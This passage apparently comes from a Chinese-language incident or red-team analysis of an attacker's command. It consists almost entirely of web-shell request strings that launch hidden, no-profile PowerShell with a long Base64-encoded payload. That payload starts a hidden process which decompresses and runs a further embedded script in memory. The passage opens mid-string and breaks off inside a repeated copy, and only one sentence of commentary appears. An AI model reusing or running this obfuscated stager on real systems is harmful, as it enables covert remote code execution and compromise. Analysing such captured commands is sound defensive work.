QADgAeQBiADEANQBnAHIAYQBZAHIARABPADAAcAB3AEsAawByAEMAUAA4AEkAcwB3AEEAawArACsAMwBCADMAagAxADAAdQBmAEIARgBxAGYAegBlAHYAYQBYAFMASABhAEMAbQBXADkANQBBAGIAWQBPAEYATQBZAFYANgB4AE4ANABwAGMAVgBFAFQAVAB0AEcATgBLAHUARgBqAC8AOQBLAGsAdQBMAGMALwBhAHEANgBiADIATwBVAE0AMABGAGUAdAAyAG4AbgBJAGMATgBqADEASwA2ADUATAB3AFYAUwBvAGMAVAB2AEkAWQBpADMAVwBUAHUARQBtAFUAUgBtAHYAZQBuAEIASAAyAHUAdABPAGMAcwBoAFMAdAA4AFEAMQBZAGUAOABBAG0ANQBrAEgAawBwAFgAVQBKAHMAbwBBADMAdwBUAHgATABtAEwARABQAHAAegBCAHcAMgBCAGIAcgBNAEIAdwBuAGsAYQB0ADQAWABvAEwAVAB0AE4ANABRAGwAbwBYAHAANQBXAHIAMQBsADcAZwBzAC8AWAA3AE0ARwBDAGMAaABiAGgAcQBNADQAeQBTAEsAYgBaAHcAOABFAEIAZQBuAHoAUQBGAGkASABzAFUAZgA4AFgAbwBGAFcAagBaAFAAQwBQAE4AWABrAGcAUgBpAEQAOQBFAEcAaQB6AFcAVwBVAGQAbwBRAC8AcwBTAE0AZQBJAE8AMwBGAFcAcQAvAHEAeQBRACsAVgB3AEsAcABNAFUAKwBrAEIAaABUAHkAaABUAHoATgB5AE0AcwBvAFAAbQBqAFcAWAB3AGkAMABLAEwANABFAFQAMABVAEEAUQBPADcAcgB5AGYASABKADgAYgBwAGkAaQA3ADkANAB6AGgAVQBZAEgAUwAzADMAWQB3AHkAeABpAGUATQBvAEoAWAB1AHAAZAA0AEwAYwBFAEUAegB3AGcAbgBpAFUANQBEAEMAdABUAFoASQBNAFMANgBzAG4AWgBJAFUAYQA2ADgAdQBKADEALwBpADUAZwBYAFkAbABEAGIATABlADIAMwBhAG4ARABXAHQATABKAHkATABlAEMAbgBUAEsAZwB0AFkAKwBXAHoAcwArAEsAVABaACsAegBzAHcAKwBYAGgATwBHACsAegBsAEQASQBYAEUAcgA4AG8AawB2AHcAWQB6AFgARgBPACsAVABiAEYAWgBpAE4AeABDAFcAVwBDADgAMwBzAE4AZgBIAEYAUAB1AEkARgA4AEEAVgAxAGYANQBCAFQAUQBzAEoAZgA5AEoAVgBNADAASQA5AG4AQwBnAHUAbABDAHEARgBxAEsAQwBLADAAdgBmAEIASABHAG8AaAAxAGcAMQBtADQAaABCAGcATwBzAHkAQgBmAHIAVQAxAFUAQgA1AFgAMABpAFgATgA4ADgAcAA3AE0AUQBlAGgAZQBvACsAaQBOAEcAMABJADQAdwB6AE8AbgBOAHMAUQBiAEkAdwBvADkAaABxAEMAdwBsAEoAUwBiAGkAawBaAGoALwBiAEQAKwByAGQAdwB6AFkAeAB5ADQAcQBLAFUAVgArAFoAVwAwAGgATwBRAHAAYwBOAGUAeABGAEsAZQBaAEMANgBVAEQAcABLAGYAMgBEAEYAMgBDAGEASQBGAEYAZwAxAGgAUQBEAHkAcwA1AGoAYgB4AEsAOABmADEARgA1AEgAbwBJAFUAcgBoAEsASQBDAGwAQgA2AGcARQByAEIAUQBJADIATAB3AGcAQgBCAFMAOQBMAEwANwBVAHQARABFADMAdwBwAGoAaQBFAEkAVAAyAHgAMQArAG4AeQBJAGYARABYAGoASgArAFQAeQBIAGsAWQA2AC8AKwBRADQAdwBWAHAAUQAvADgATABlAEMAbwBjAEgAZwBXAEkAZABUAFkAcABoAEYAdgBDAEEANQBKAE8ARgB3AGoAQgBiAFIANwBLAHYAMwBIAEMASgA1AGQASQBZAGQAWQBlAGcAawB1AEMAeQBKAFcAQgAyAFcAcAA1AHIAdwBnAGUAQwAyAHkAQwAxADYAVwAwAE8AeQBCAFMARABpAEEAbwBDAGQAUgBxAEsASQBVAHYAKwBrAGUAYgBnAHYAeABWAFUAcwBqAC8AZgBOAHgAUAAzAHAAVQA0AE4ASAAwAGoANQBhAGoAMgBsAE4AbgBZAFoAagBlAGsATgBvAEcAdAAyADgAMQBNAHAAbwBHAGcAVQBIAGEAaABnAC8AegBmAEsAcgA1AFkAeQA3AEgANwB5AGUAVAB3AGQARAB1AEQANQBTAGsAdgB3AHYAVwBpAHAARQBhADIAawBEAE4AcgBiAGEAcQB1AEEATgB5ADQAUQB6AFYANgBSAFQAMABTAEcAOQBrADMAZQA4AE0AeABWAE4ARABmACsANwBmADkAcgBiAEcATwBKAGcAYgA0AEsAZwAzADgAZwAwAGYAdgBxAG8AUgB1AEsAcQA4AGsASAAxAFYAMQBuAHMAagBXAHcAMAAwAEkAaQB1ACsAYgBRADIAcwBiAG4AdABoAHQAQwA2AHAAUwBoADUAdAB3ADEAWQBHAHMAeQBkAC8AVAAzADYAMABiAG4AYwB3ADMAMAAyAFUARwAzAE8AbwBCAFAAbwBIAFQAMgA5ADMAOQBMADMAKwBwAHQAQgBmAGIASwA1AEgAZgBXADAALwBkADQAdQA1AGQAWgB0AHEAUgBBAE0ALwBtAG4ANQByAE8AUQBHAGUATwBiAEUANgAwAC8AUwBGADUAYwBTAEcAZgA3AHIAMQBMAFcAZgBVADYAdQBxAEIAQwB1AHMARwAyAFkAMQBpAHUAdwBWAFAAdQB6ADEAOABZAE4ANgBqAFMAUwA4AGYAVABRAGoAWABjAGgAWgBEAGcAaABlAEcAagAzAE4AZgBzAFIAVABGAHYAbQBYAFUAdgB0AHYAMgBGAE8AWAA2AHcAbQBXAEwAeQBmAGwARwBuADgATABhAFoAbQBLAHcAbgBYAFUAWABtADEANQArAE8AMgBpADkAZABVAHkAQwA0ADAAaQB4AE4ARQBYAFIASwBaAHoATABVAEUASABiAGYAcQBzADkAaQA5ADUAYgB6AHIAawAxADEAZQBSAGQAUABwAFYAMwBXACsAMgArAHQAZABYAEkAYwBMAHMAcAB2ADkAUAByAE4AMgAvADgAMQByAG8ANwBiAGoAbQAyAHcAUQBZAG8AVQBDAEgAZQBmAE4AagBkAGsATwBFAHAANwBJAFgASQBrAFcALwBYAEwAYQBmAEEAcgA2ACsAeAAxAGkATwBiAFUAegBUAHUAdABTAE4ANgAxADIAcABQAFMAZgA5AEMAVgBRADIAQwBoAHoAZQBtAFMAegArAHIAawBEAFAAWQBPAEwAZgB1AG8AbAA3AEgARABkAFkAUQBrACsARgBmAFcAdgA0ADgAWQBoADIAMABBAGIAcwB6AFgANABIAG8ASQBEACsAbwA4ADMAcABvAGcASQA2AGEAVQBiAEsAWgBuAHMANABMAFcAOABPAHQASABBADUAMwBjAGgARgBuAE8ATAB5AEUAMgBEAHAAbABEAEEAcABuAHgAcgB3AEYAOABTAG0ARAB2AHQAMQBqADEANwBZAHgANwAzAGgAWQBWADEAdQBuADcAcgB0AFgAQgBXAFcAQgBzADcAWAA0AFkAcQBDAGgAWgAyAFQAOABXAFQAOAB4AFUAWgBJAEcAaQBBAEoASgBvAFYARgBVADEANABNAGUASgBYAHAANQA5ADQAOABqAFUAbQBpAEkANAB2ADYAUABZAFkATQBUAGgAaQBrADAAWABHAGoASgAxAFEARgBUAEsASQAzAGMAbwB2AFYAQQBsADQAQwBtAGQAMgBoAEYAUgBXAGUAYwB3AHYAQgAxADUAOABXAFIASgBEAHcASgBTAHQAOABhAFUAcgBWADAAZABiAFcAQQBHAE8ARwA4AFIAbgBaAHoAaABKAG4AUABnADQAYQA4AGUAeQAzAEwAMABGADcAawBYAFYAZQBHAEYASAA4AC8AcQAxADQAVQA1AHkASQBZAGEAaABUAE4ANgBZAEQASwB3AFQARABkAEcANQBhAEsANAAxAHQARAA0AFEANwBKAC8AeQA5AFkANQBhADAAUgB3AE0AZgA3AE4AVgBqAGYAMQBuADYAeAArADEAcwBBAHkAbwAwAHkANABSAC8AVwB2ADEALwA0AEkAMABEAC8ATwBQAE0AWgBJAGgAdwBrAGIAYgBqADMASwBEADUAMAAzADUAYwBBAEsASQBuAHgANwBQAGQAawBYAHgAVwBvAC8ATABwADgAaQBoAC8ATQBEAHgAawAvAHUANABIAGYAbABwAFAAagBmAHcARgA2AEoAcQBhADEAeQB3AG8AQQBBAEEAPQA9ACcAJwApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA== pwd=asasd3344&cmd=%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAEgALwBUAEUAbAAwAEMAQQA3AFYAVwBiAFcAKwBiAFMAQgBEACsAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE8AbgBUAFMATgBWAE8AcgBBAGgAeAByAFYAVABVADIAegBzADIARwBlAGQATQBLAHgAaAA0ADIAVQBoAHMATQBRAG0AdgBmADcAMwBtADcAVQBoAFQAYQAvAHAAWABYAHYAUwBJAFMAVAAyAFoAVgA2AGUAbQBYAGwAMgBoADMAVgBPAFAAWQBaAGoASwBuAGkASgBKAFgAdwArAE8AVAA0AGEAdQBhAGsAYgBDAFYATABOAHUAMgBqAFgAaABkAG8AcQBVAE8AUwBqAEkAMQBpAHUAWgBmAGQATwBJAEwAdwBYAHAASQBXAGEASgBOADAANABjAGoARgBkAFgAbAAxADEAOABqAFIARgBsAEIAMwBtAGoAVwB2AEUAMQBDAHgARAAwAFkAcABnAGwARQBtAHkAOABLAGMAdwBEAFYARwBLAHoAagA2AHUANwBwAEQASABoAE0AOQBDADcAWQAvAEcATgBZAGwAWABMAGkAbgBGAGkAbwA3AHIAaABVAGcANABVADYAbgBQADkAdwBhAHgANQAzAEkAcwBEAFQAcwBoAG0ARQBuAGkANwA3ACsATAA4AHUASwBzAHQAVwB6AG8AOQA3AGwATABNAGsAbQAwAGkANAB5AGgAcQBPAEUAVABJAHMAcgBDAEYANQBrADcASABCAGMASgBrAHMAUQBoADkAdABJADQAaQA5AGUAcwBNAGMAWAAwADkAWABsAGoAUQBqAE4AMwBqAFcANwBBADIAZwBNAGEASQBoAGIARwBmAGkAYgBLAEUAQQBXADgASwBXAEoANQBTAG8AVgA5AFAATgB6AEEAWQBWAHMAUwBZAFQAaABLAFkAMAAvADEALwBSAFIAbABtAFYAZwBYAEYAdAB6ADAAWQByAG4AOABUAFYAcQBVAGYAagAvAGwAbABPAEUASQBOAFUAegBLAFUAQgBvAG4ATgBrAG8AZgBzAEkAZQB5AFIAcwArAGwAUABrAEcAZgAwAEgAbwBKAFcAagBaAEwATQBRADIAVwBzAGcAeABpAEQALwBFAEcAUwBUAFcAYQBFADEASQBYAGYAcwBXAE0AZABJAE8AMgBWAGQAWgArAFYAawBsADYAcgBnAFIAUwBJADUAYgBLAGQAYQBqAGoAQwAzAEUATwBZAHoAOABuADYASwBBAHAAdgBnAEMAVQAxADEANgBHAHAANgB3AC8ASgBPADcATAB5AGYASABKADgAYgBxAGkAeQByADMAZABmAGsANABWAEcAQgAwAHQAOQBtAE0ARQAyAEsAUgBSAG4ATwBHADkAMgBIAHQAQgBxAFEAdABEADgATwBLAHkATwBDADEAZwBXAGgAdQBuAE8AWgBLAFgAVAA1AGsAVgBhAGsAaQA3AHEALwA5AFkAdgBWAFgASgBnAGkAVABoADUARgBzADQATQBmAGEAWABvAEYARABXAHMAZwBaAFYANQBzAHMALwBwAG0AUQBYAHIAVABGAEYAMwBZAEsANgBFAGYAWQBxADEAawBrAHYANQBSAGUAdABDAGQAcQBIADEANgBqAEUAYgBnAEMAUgBKAEoAWQBiAHkATwA4AGkAZwBnAEsAWAA4AFkAegB4AE0AbgArAG4AcABrAGUAWQBQAGUAbABxAE8AUwBZACsAUwBsAFUAUABhAHAAUQBCAEsAaQBpAGYALwBDADIAWQBRAHgARQBrADAAYQBSAEQARgBFAEYAKwBEAG4AUABnAFgAVwAwAE4AWABFAGUAVgBkAE0AbgB2AG8AdgBMAE8ANQB5AEEAawBkAG8AaQBiAFoAWABWAGgAbABNAE4AaAA4ACsAcQBDAGoAVgB5AEMALwBMAHEAZwAwAGcAeQBYAFcAMgByAE8ANAB2ADEAUQAvAEEAcAAzAG0AQgBPAEcAUABUAGQAagBsAGIAbQBsAFgASwBhAHgAZABOAGUASgBhAGMAYgBTADMASQBPAEsAUQBlAGgAagBPADAARQBlAGQAZwBuAFAAUgBGADMAbwBZAFIAOQBwAGgAWQAyAEQAeQBxADMANABZAGgANAA2AEwAaQBGAHcAQQBzAEQAUwBBADkAUQBCAFYAbgBqADgATgB1AE0AOABTAEEARQBoAHIANwBuAGMAcwBCAEUAegBvADQAUwBnAEMARQBUADIAWgA5ADQAZwBiAGcAQQBuAHYASwBUADUAbgBqAGQAdQBnAEgAegB4AGIALwBnAHEARgBoADgAbwB5AHgATgBSAFoAZQBBAFoATwBxAGkAdQBUAFcASgBXAEYAeAB5AGMATQByAGcANQBlAEYASgBKADgASgA5AGMAUAA3ADgAdwBBAEUAUQBuAFIAVwBVAE4AcABPAHAAVQBMAEwAUwBDAGMAVABMAFgASAB2AFUAZAA1ADIASwBaAGsASAAzADQASwBZAFAAUQBqAFQAUwBPAE4ARABkAEQAYgA5AHEASABxADAARgA2ADEAZABSAHgAOQAyAEwAVQBqAFIAOQBWAGUASABUAGoAawArAFYAbwA5AHMAUwBaAG0AMABPAC8AVAAyAHkAVAAyAGIAYwA2AEgAawB6AEMAMABNAFEAdABNADQAQgA1AE0AZABHAEQARQBWAE8AUwBEACsATgB4AHIAMgA5ADMAZQAyAHIAYQAzAFkAVgByADEAYwB4AE0AdgBhAGMAVgBWAGsAdABUAHYAUgA1ACsANgAvAFMAMQB5AFEAVAAwAGMARwBkAGcAMwBlADEATQAxAGQAZQBpAFkAQgBiAGMAZAByAGIAbQBLAEoAeQBaADQASwBnAHoAQwBNAHcAQQB2AHAAbwBaAGUAcABvAHkAVgB3AEoATgBNAFQAbwBEAFcAdwB0ADEAcgBLAGkAQgBiAGYAVwBzAGQAbQB0AHUATgBpACsASgBoAGgAOQB0ADAAMQBaADcAMAB5AGQALwBUADMANwAwAGQAcgBzADMAMgA0ADMAVgBtADIARgBmAEQAWQAyAFAAdgB0AEUANgBOAC8AYgA2AEcANgA0AC8AMwAxAHcAUAB1AHYAcAArADcAdgBHADUAZABaAHYAcABXAEEAYwAvAHUAbgBGAHIATwBTAEcAYQBPAG8AawAyADEAWQAyADUANQBTAFIAbQBjAEwAbwBOAEwARwBmAFEAYgBCAHUAaABCAHUAcwBtADMAZwAwAFMAdQB3AGwAUABxADkAVgAvAG8AUAA3AGoAawBGAHcAKwBEAGcARwB1ADUAYwB6ADcARwBNADMATgBBAEIAVwBCAGEAcQBtAHEAZgBVAHUASgB2AGQAcAAyAFYAUABYADYAcgBVAGYAbgA0ADQAdQBOAE0AWQBHADEAegBkAGkAawBPADIAdQBWAEQAUAAzAGkAdAB0AGQAOAA1AHcAdwB4AFMAbQBMAFYAMABsAFgAVgBJAEgAQQBXAEkAOQBYAGQAZABwAHUAdABhAGYAegBCAGMAaQA2AHMAaQBhADcAcwBpAG8AbQB5ADIAKwBwADMAegBhADIATwArADkAdABOACsAWgAxAGMAdgAzAGsAVABOAE4AZgB0AFUAZABPAHgAVABkAHAAegBRAHcAMwB3AEYAdgAzADIAQgB2AGQAUABZAFMAOQB5AEgAZQBWADIAMwBYAFIANAAvAHIAbwA2AGIAVAA3AFMARwBYAEYASABuAFYAWgBNAFYAcwAzAFcAQgBIAGYAZgBhAHAAcQBKAFUAZgA5AG0ANgBKAEYANwBEAFcASQBHAEcAeABmAFcASwB1ADYAYwBlACsARQBhAE0ASgBuAEIAcABSAFgATQBZAG4AcgB1AGIAcwBEAHUATgBGAEEAQgBIAGMAUQBIAGQAVgA3ADMAVABkAEQAUgBjAG8ASQAzAGsAOQBNAFoAdAA5AFgAZgBLAGwARgAvAHAAMwBDAGMAVQBmADgAUwBzAEoAMgBYAEcARgBSAEcAegBWAGsAVAA4AEsAbQA5AHIAdAAyAGgAMQA3AFkANQBPAC8AZQBSAG8AVABWAFAAdgBmAGUAdgBPAEcATwBCAHMAagBVADAAZQBQAGUATQBpAGoAOQBxAEgAVQBNADMAegBVAEsAWABBAEUAVwBoAEoAMQBRAFgAZwBoAEcAbgBSAG4AbgBQAGoAMgBMAE0ATgBTAFMASgAvAHgAcABzAFUARQBvAFIAZwBkAFkASwB6AGIAYwA2AFYAeQBvAGgAcwBjAGUAYgBEAEcAOABJADAATgA4AE8AWABZAGMAMwB3AFEAawBNAFgANQArAC8ATwBKAEsARgBKADAASAA1AGEAKwArAHAAbABxADYAdQA1AG8AQQBSAGoAaQBxAGMAcABzAFkAQQAwAFkAQwBGAGQAVwBYADMAVwBsAEcAZwBsAFMAaQA3AHQAZwBJAFIALwBuAHgAWQBuAFQAZwBwAEoARwA2AHAAegBqAHMAUgB6ADAAcABwAG0ATwB3AE4AeQAvAHoANAAxAG4ASgBGAGUANQBqACsAcgA5AGsAcQBMADQAMABRAFAAdgA2AC8AWgBPAHYAcgAyAGoALwBzAC8AbABRAEcAbABmAG8AKwAzAHUAOQBXAHYAMQAzADQAcABYAFQAKwBhAHQAeABUAEYAegBNAFEAdABPAEgATwBJACsAagBRAGIAVgA4AE0AdgArAFQARgBzAHgAKwBSAGYAVQAyAGcANwB1AHYAeQA0AGIAKwBTAEgAMwBOADIAZABnAE0ALwBLAEMAZgBIAGYAdwBIADIAZwB3AHkAdABzAHcAbwBBAEEAQQA9AD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

获取到攻击队使用执行powershell命令,分析情况如下图所示:

pwd=asasd3344&cmd=cmd /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACcASAA0AHMASQBBAEgALwBUAEUAbAAwAEMAQQA3AFYAVwBiAFcAKwBiAFMAQgBEACsAbgBFAGoANQBEADYAaQB5AEIAQwBpAE8AagBWAE8AbgBUAFMATgBWAE8AcgBBAGgAeAByAFYAVABVADIAegBzADIARwBlAGQATQBLAHgAaAA0ADIAVQBoAHMATQBRAG0AdgBmADcAMwBtADcAVQBoAFQAYQAvAHAAWABYAHYAUwBJAFMAVAAyAFoAVgA2AGUAbQBYAGwAMgBoADMAVgBPAFAAWQBaAGoASwBuAGkASgBKAFgAdwArAE8AVAA0AGEAdQBhAGsAYgBDAFYATABOAHUAMgBqAFgAaABkAG8AcQBVAE8AUwBqAEkAMQBpAHUAWgBmAGQATwBJAEwAdwBYAHAASQBXAGEASgBOADAANABjAGoARgBkAFgAbAAxADEAOABqAFIARgBsAEIAMwBtAGoAVwB2AEUAMQBDAHgARAAwAFkAcABnAGwARQBtAHkAOABLAGMAdwBEAFYARwBLAHoAagA2AHUANwBwAEQASABoAE0AOQBDADcAWQAvAEcATgBZAGwAWABMAGkAbgBGAGkAbwA3AHIAaABVAGcANABVADYAbgBQADkAdwBhAHgANQAzAEkAcwBEAFQAcwBoAG0ARQBuAGkANwA3ACsATAA4AHUASwBzAHQAVwB6AG8AOQA3AGwATABNAGsAbQAwAGkANAB5AGgAcQBPAEUAVABJAHMAcgBDAEYANQBrADcASABCAGMASgBrAHMAUQBoADkAdABJADQAaQA5AGUAcwBNAGMAWAAwADkAWABsAGoAUQBqAE4AMwBqAFcANwBBADIAZwBNAGEASQBoAGIARwBmAGkAYgBLAEUAQQBXADgASwBXAEoANQBTAG8AVgA5AFAATgB6AEEAWQBWAHMAUwBZAFQAaABLAFkAMAAvADEALwBSAFIAbABtAFYAZwBYAEYAdAB6ADAAWQByAG4AOABUAFYAcQBVAGYAagAvAGwAbABPAEUASQBOAFUAegBLAFUAQgBvAG4ATgBrAG8AZgBzAEkAZQB5AFIAcwArAGwAUABrAEcAZgAwAEgAbwBKAFcAagBaAEwATQBRADIAVwBzAGcAeABpAEQALwBFAEcAUwBUAFcAYQBFADEASQBYAGYAcwBXAE0AZABJAE8AMgBWAGQAWgArAFYAawBsADYAcgBnAFIAUwBJADUAYgBLAGQAYQBqAGoAQwAzAEUATwBZAHoAOABuADYASwBBAHAAdgBnAEMAVQAxADEANgBHAHAANgB3AC8ASgBPADcATAB5AGYASABKADgAYgBxAGkAeQByADMAZABmAGsANABWAEcAQgAwAHQAOQBtAE0ARQAyAEsAUgBSAG4ATwBHADkAMgBIAHQAQgBxAFEAdABEADgATwBLAHkATwBDADEAZwBXAGgAdQBuAE8AWgBLAFgAVAA1AGsAVgBhAGsAaQA3AHEALwA5AFkAdgBWAFgASgBnAGkAVABoADUARgBzADQATQBmAGEAWABvAEYARABXAHMAZwBaAFYANQBzAHMALwBwAG0AUQBYAHIAVABGAEYAMwBZAEsANgBFAGYAWQBxADEAawBrAHYANQBSAGUAdABDAGQAcQBIADEANgBqAEUAYgBnAEMAUgBKAEoAWQBiAHkATwA4AGkAZwBnAEsAWAA4AFkAegB4AE0AbgArAG4AcABrAGUAWQBQAGUAbABxAE8AUwBZACsAUwBsAFUAUABhAHAAUQBCAEsAaQBpAGYALwBDADIAWQBRAHgARQBrADAAYQBSAEQARgBFAEYAKwBEAG4AUABnAFgAVwAwAE4AWABFAGUAVgBkAE0AbgB2AG8AdgBMAE8ANQB5AEEAawBkAG8AaQBiAFoAWABWAGgAbABNAE4AaAA4ACsAcQBDAGoAVgB5AEMALwBMAHEAZwAwAGcAeQBYAFcAMgByAE8ANAB2ADEAUQAvAEEAcAAzAG0AQgBPAEcAUABUAGQAagBsAGIAbQBsAFgASwBhAHgAZABOAGUASgBhAGMAYgBTADMASQBPAEsAUQBlAGgAagBPADAARQBlAGQAZwBuAFAAUgBGADMAbwBZAFIAOQBwAGgAWQAyAEQAeQBxADMANABZAGgANAA2AEwAaQBGAHcAQQBzAEQAUwBBADkAUQBCAFYAbgBqADgATgB1AE0AOABTAEEARQBoAHIANwBuAGMAcwBCAEUAegBvADQAUwBnAEMARQBUADIAWgA5ADQAZwBiAGcAQQBuAHYASwBUADUAbgBqAGQAdQBnAEgAegB4AGIALwBnAHEARgBoADgAbwB5AHgATgBSAFoAZQBBAFoATwBxAGkAdQBUAFcASgBXAEYAeAB5AGMATQByAGcANQBlAEYASgBKADgASgA5AGMAUAA3ADgAdwBBAEUAUQBuAFIAVwBVAE4AcABPAHAAVQBMAEwAUwBDAGMAVABMAFgASAB2AFUAZAA1ADIASwBaAGsASAAzADQASwBZAFAAUQBqAFQAUwBPAE4ARABkAEQAYgA5AHEASABxADAARgA2ADEAZABSAHgAOQAyAEwAVQBqAFIAOQBWAGUASABUAGoAawArAFYAbwA5AHMAUwBaAG0AMABPAC8AVAAyAHkAVAAyAGIAYwA2AEgAawB6AEMAMABNAFEAdABNADQAQgA1AE0AZABHAEQARQBWAE8AUwBEACsATgB4AHIAMgA5ADMAZQAyAHIAYQAzAFkAVgByADEAYwB4AE0AdgBhAGMAVgBWAGsAdABUAHYAUgA1ACsANgAvAFMAMQB5AFEAVAAwAGMARwBkAGcAMwBlADEATQAxAGQAZQBpAFkAQgBiAGMAZAByAGIAbQBLAEoAeQBaADQASwBnAHoAQwBNAHcAQQB2AHAAbwBaAGUAcABvAHkAVgB3AEoATgBNAFQAbwBEAFcAdwB0ADEAcgBLAGkAQgBiAGYAVwBzAGQAbQB0AHUATgBpACsASgBoAGgAOQB0ADAAMQBaADcAMAB5AGQALwBUADMANwAwAGQAcgBzADMAMgA0ADMAVgBtADIARgBmAEQAWQAyAFAAdgB0AEUANgBOAC8AYgA2AEcANgA0AC8AMwAxAHcAUAB1AHYAcAArADcAdgBHADUAZABaAHYAcABXAEEAYwAvAHUAbgBGAHIATwBTAEcAYQBPAG8AawAyADEAWQAyADUANQBTAFIAbQBjAEwAbwBOAEwARwBmAFEAYgBCAHUAaABCAHUAcwBtADMAZwAwAFMAdQB3AGwAUABxADkAVgAvAG8AUAA3AGoAawBGAHcAKwBEAGcARwB1ADUAYwB6ADcARwBNADMATgBBAEIAVwBCAGEAcQBtAHEAZgBVAHUA